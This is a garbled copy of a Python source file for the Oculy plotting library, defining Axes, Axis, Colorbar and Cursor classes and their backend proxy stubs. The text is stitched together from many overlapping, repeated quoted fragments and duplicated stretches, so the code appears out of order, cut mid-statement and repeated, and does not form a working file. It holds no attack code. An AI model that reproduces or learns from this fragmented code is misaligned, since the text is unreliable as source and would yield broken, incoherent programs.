left_axis = Typed(Axis) bottom_axis = Typed(Axis)", "any valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes", "major grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled = Bool()", "None ) for pa in axes.values() ): unknown = [] missing = []", "self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis", "with {id} already exist in axes {self}\") axes = plot.axes_mapping if not axes:", "for axes. As in matplotlib an axis is expected to provide way to", "axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to", "id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference", "Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure holding the axes.", "#: Display a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be", "= plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else", "any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is", "pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is expected", "enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self,", "to specify to which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self):", "impact only if there are only 2 active #: axes in the axes_set.", "an impact only if there are only 2 active #: axes in the", "Bool() #: # SHOULD NOT be edited in place. legends = Dict(str, str)", "remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self,", "this object. 
left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis =", "None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent", "possibly discountinuous axis. limits = List(tuple) #: Is the axis direction inverted. inverted", "inverted. inverted = Bool() #: Label of the axis label = Str() #:", "tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\"", "zooming/panning and modifiers # TODO Add the ability to link axes (accross different", "self, axes=None ): # Need to specify to which axes the cursor is", "self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return", "Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log", "pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no breaks pass", "location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling", "to define the proper API to enable zooming/panning and modifiers # TODO Add", "plot based on its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot", "plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\",", "class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is expected to", "2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Is the", "tick_labels = List(str) #: Font used for the label label_font = Dict(str) #:", "bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with", "the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist", "be used. 
if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or", "def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify", "sure the plot knows where it is plotted. plot.axes = self self.plots[plot.id] =", "def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize()", "remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): #", "#: List of 2 tuple representing a possibly discountinuous axis. limits = List(tuple)", "to provide way to draw into the axis and way to manipulate the", "= [] missing = [] for lab, pa in axes.items(): if pa not", "f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used", "= ForwardTyped(lambda: Axes) #: Position at which the colorbar should be created. location", "def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str],", "List(tuple) #: Is the axis direction inverted. inverted = Bool() #: Label of", "axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue", "on the graph cursors = ATuple(Cursor) #: Set of plots currently displayed in", "for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for", "scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported", "auto_scaling = Bool() #: List of 2 tuple representing a possibly discountinuous axis.", "missing]}.\" ) # Make sure the plot knows where it is plotted. 
plot.axes", "raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): #", "pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar", "x_value = Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME", "ForwardTyped(lambda: Axes) #: Position at which the colorbar should be created. location =", "set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font:", "self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values():", "atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import", "to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str):", "way to draw into the axis and way to manipulate the axis appearance.", "'bottom', provided axes are \" f\"{[pa for _, pa in unknown]}).\" ) else:", "class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling - bounds \"\"\"", "p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis,", "figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis", "= { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else", "colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver)", "axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in", "axes. 
As in matplotlib an axis is expected to provide way to draw", "def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def", "associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api", "ATuple(Cursor) #: Set of plots currently displayed in the axes plots = Dict(str,", "Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio", "#: Set of plots currently displayed in the axes plots = Dict(str, BasePlot)", "bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button:", "p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the", "{[lab for lab, _ in missing]} do not \" \"exist. Existing axes are", "only 2 active #: axes in the axes_set. intercept = Float() # FIXME", "for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis,", "an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\"", "str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id:", "-> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the", "Display a major grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled", "\"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id:", "TODO Add the ability to link axes (accross different figures ie beyond #", "# lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def", "as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from .base 
import", "set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass", "axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar should be created.", "= Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need", "proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis,", "self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self,", "a plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with", "if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes", "#: Label of the axis label = Str() #: Tick labels. tick_labels =", "to link axes (accross different figures ie beyond # matplotlib default) # ---", "of the BSD license. # # The full license is in the file", "for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an", "if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del", "for pa in axes.values() ): unknown = [] missing = [] for lab,", "need to sync to the proxy def _resolve_figure(): from .figure import Figure return", "other axis in data coordinate. #: Setting this values will have an impact", "this values will have an impact only if there are only 2 active", "pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes.", "plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id}", "draw into the axis and way to manipulate the axis appearance. 
\"\"\" @mark_backend_unsupported", "def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]):", "tick labels tick_labels_font = Dict(str) #: Intercept position of this axis with the", "place. legends = Dict(str, str) #: Projection to use on the axes. projection", "f\"Plot {id} does not exist in axes {self.axes},\" f\" known plots are {self.plots}\"", "pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend:", "Position at which the colorbar should be created. location = Enum(\"right\", \"top\", \"left\",", "a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver:", "#: Colorbar associated with plot if any. colorbar = Typed(Colorbar) #: Set of", "graph cursors = ATuple(Cursor) #: Set of plots currently displayed in the axes", "axes: Tuple[str, str]): # What axis are we linked to pass def remove_cursor(self,", "Display a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited", "plot if any. 
colorbar = Typed(Colorbar) #: Set of cursors currently active on", "{id} already exist in axes {self}\") axes = plot.axes_mapping if not axes: axes", "axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist in", "in matplotlib an axis is expected to provide way to draw into the", "add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in", "else: raise RuntimeError( f\"The axes used for {[lab for lab, _ in missing]}", "API #: Reference to the backend resolver needed to dynamically add axes _resolver", "axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str, position: float,", "tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on", "the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str,", "autoscaled auto_scaling = Bool() #: List of 2 tuple representing a possibly discountinuous", "Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy):", "= Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot", "displayed in the axes plots = Dict(str, BasePlot) #: Display a major grid", "remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #:", "@mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str,", "axis in data coordinate. #: Setting this values will have an impact only", "set_limits(self, limits): # Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self,", "Float() # FIXME Add connections to the proxy and a way to prevent", "= Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if any. 
colorbar", "str]): # What axis are we linked to pass def remove_cursor(self, index: int):", "if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the", "): pass def remove_line(self, id: str) -> None: pass # FIXME Need to", "axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis) bottom_axis", "bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str) ->", "API to enable zooming/panning and modifiers # TODO Add the ability to link", "not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\"", "representing a possibly discountinuous axis. limits = List(tuple) #: Is the axis direction", "NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited", "# Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass", "pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab for", "Distributed under the terms of the BSD license. # # The full license", "# -------------------------------------------------------------------------------------- # Copyright 2020-2021 by Oculy Authors, see git history for more", "the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis):", "minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited in place.", "minor_grid_enabled = Bool() #: # SHOULD NOT be edited in place. 
legends =", "the graph cursors = ATuple(Cursor) #: Set of plots currently displayed in the", "have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based", "# --- Private API #: Reference to the backend resolver needed to dynamically", "__init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not", "= Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync to the", "SHOULD NOT be edited in place. legends = Dict(str, str) #: Projection to", "\"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", }", "axis direction inverted. inverted = Bool() #: Label of the axis label =", "-> None: pass # FIXME Need to define the proper API to enable", "pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self):", "f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes", "pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need", "plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool() #:", "used for {[lab for lab, _ in unknown]} do not \" \"correspond to", "for more details. # # Distributed under the terms of the BSD license.", "with the other axis in data coordinate. #: Setting this values will have", "a possibly discountinuous axis. 
limits = List(tuple) #: Label of the axis label", "= Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object and the", "axes are \" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for", "@mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass", "float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str)", "orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def", "beyond # matplotlib default) # --- Private API #: Reference to the backend", "def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] =", "prevent self recursion # FIXME Add convenience to connect axes between them class", "missing = [] for lab, pa in axes.items(): if pa not in (\"left\",", "to any valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided", "an axis is expected to provide way to draw into the axis and", "self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of", "in data coordinate. #: Setting this values will have an impact only if", "{self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self}", "label label_font = Dict(str) #: Font used for the tick labels tick_labels_font =", "to pass def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add", "#: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at", "self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are", "a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. 
As in matplotlib an axis", "are \" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for _,", "2 active #: axes in the axes_set. intercept = Float() # FIXME Add", "pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self,", "of cursors currently active on the graph cursors = ATuple(Cursor) #: Set of", "Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis)", "#: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value =", "BasePlot) #: Display a major grid major_grid_enabled = Bool() #: Display a minor", "are only 2 active #: axes in the axes_set. intercept = Float() #", "to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which the", "in axes {self}\") axes = plot.axes_mapping if not axes: axes = { \"x\":", "else \"right\", } plot.axes_mapping = axes # Validate the axes supposed to be", "axes supposed to be used. if any( ( pa not in (\"left\", \"bottom\",", "tuple representing a possibly discountinuous axis. limits = List(tuple) #: Label of the", "\"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise", "in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): #", "enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass", "# FIXME Need to define the proper API to enable zooming/panning and modifiers", "labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a", "able to add more elements #: later on. 
self._resolver = resolver def finalize(self):", "set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with", "\"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the axes", "their associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from", "Bool() #: Label of the axis label = Str() #: Tick labels. tick_labels", "edited in place. legends = Dict(str, str) #: Projection to use on the", "figures ie beyond # matplotlib default) # --- Private API #: Reference to", "\"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing:", "history for more details. # # Distributed under the terms of the BSD", "Dict(str, str) #: Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\")", "for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name", "def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to", "pass def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a", "for lab, pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"):", "ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple from atom.api import", "the proxy and a way to prevent self recursion # FIXME Add convenience", "Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis =", "to the figure holding the axes. 
figure = ForwardTyped(_resolve_figure) #: Axes composing this", "add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self)", "str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def", "= self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p", "axes are \" f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError(", "plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if id", "# Copyright 2020-2021 by Oculy Authors, see git history for more details. #", "with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\"", "the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis:", "aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float()", "ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa", "<gh_stars>0 # -------------------------------------------------------------------------------------- # Copyright 2020-2021 by Oculy Authors, see git history for", "the label label_font = Dict(str) #: Font used for the tick labels tick_labels_font", "ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling = Bool() #: List", "AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. 
Handle: - scaling - bounds \"\"\" @mark_backend_unsupported", "if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name", "Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str) -> None: pass", "self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar", "@mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no breaks pass @mark_backend_unsupported", "reference to the resolver to be able to add more elements #: later", "active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if", "float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass", "axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling = Bool()", "#: Font used for the tick labels tick_labels_font = Dict(str) #: Intercept position", "for _, pa in missing]}.\" ) # Make sure the plot knows where", "Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class", "[] for lab, pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\",", "discountinuous axis. limits = List(tuple) #: Label of the axis label = Str()", "..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy", "active #: axes in the axes_set. intercept = Float() # FIXME Add connections", "missing: raise RuntimeError( f\"The axes used for {[lab for lab, _ in unknown]}", "it is plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the plot", "software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. 
\"\"\" from typing", "pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self):", "plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position", "Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need to", "raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\" known plots", "axes (accross different figures ie beyond # matplotlib default) # --- Private API", "c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis,", "self.plots[plot.id] = plot # Initialize the plot if we have a resolver if", "axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]):", "Float(float(\"nan\")) # FIXME need to sync to the proxy def _resolve_figure(): from .figure", "pa in missing]}.\" ) # Make sure the plot knows where it is", "c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize()", "2020-2021 by Oculy Authors, see git history for more details. 
# # Distributed", "= ATuple(Cursor) #: Set of plots currently displayed in the axes plots =", "proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar:", "self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar", "@mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a", "used for the tick labels tick_labels_font = Dict(str) #: Intercept position of this", "= Float(float(\"nan\")) # FIXME need to sync to the proxy def _resolve_figure(): from", "more elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy", "specify to which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass", "2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Label of", "sync to the proxy def _resolve_figure(): from .figure import Figure return Figure class", "Dict(str) #: Intercept position of this axis with the other axis in data", "(self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if", "self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p", "resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its", "float]] = None, ): pass def remove_line(self, id: str) -> None: pass #", "the ability to link axes (accross different figures ie beyond # matplotlib default)", "representing a possibly discountinuous axis. limits = List(tuple) #: Label of the axis", "if there are only 2 active #: axes in the axes_set. intercept =", "BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. 
Handle: -", "\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self,", "license is in the file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis,", "set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported", "Axes) #: Should that axis be autoscaled auto_scaling = Bool() #: List of", "limits = List(tuple) #: Label of the axis label = Str() #: Tick", "pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation:", "@mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None", "axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self):", "linked to pass def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None:", "\" f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes", "the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str, position:", "enable zooming/panning and modifiers # TODO Add the ability to link axes (accross", "= resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in", "#: Position at which the colorbar should be created. 
location = Enum(\"right\", \"top\",", ".figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference", "@mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported", "Str from atom.api import Tuple as ATuple from atom.api import Typed from ..backends.resolver", "import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple", "@mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self,", "Float, ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple from atom.api", "recursion # FIXME Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar", "Font used for the tick labels tick_labels_font = Dict(str) #: Intercept position of", "axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for", "to be able to add more elements #: later on. self._resolver = resolver", "in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis):", "axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if", "if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a", "the axes_set. 
intercept = Float() # FIXME Add connections to the proxy and", "set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\"", "def add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id", "for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str,", "= Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str) #:", "self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def", "def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a", "state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported", "Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the", "axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or", "where it is plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the", "str) -> None: pass # FIXME Need to define the proper API to", "missing]} do not \" \"exist. Existing axes are \" f\"{[ax for ax in", "\"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes. 
